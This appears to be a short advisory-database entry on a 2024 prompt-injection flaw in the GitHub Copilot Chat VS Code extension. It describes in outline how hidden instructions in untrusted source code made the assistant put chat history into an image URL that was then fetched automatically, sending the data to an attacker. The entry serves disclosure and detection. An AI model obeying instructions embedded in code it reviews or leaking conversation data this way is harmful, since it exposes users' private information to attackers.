high

GitHub Copilot Chat Vulnerable to Data Exfiltration

Published Fri, Jun 14th, 2024
Platforms

Summary

GitHub Copilot Chat VS Code Extension was vulnerable to data exfiltration via prompt injection when analyzing untrusted source code. The vulnerability allowed attackers to access previous conversation turns and append information from the chat history to an image URL, which was then automatically retrieved by Copilot, sending the data to the attacker.

Affected Services

GitHub Copilot Chat

Remediation

None required

Tracked CVEs

No tracked CVEs

References

Entry Status
Stub (AI-Generated)
Disclosure Date
Sun, Feb 25th, 2024
Exploitablity Period
Until 2024/06/12
Known ITW Exploitation
-
Detection Methods
Monitor for unexpected outbound image requests from the GitHub Copilot Chat extension. Review source code for potential malicious instructions that could trigger prompt injection attacks.
Piercing Index Rating
-
Discovered by
wunderwuzzi, Embrace The Red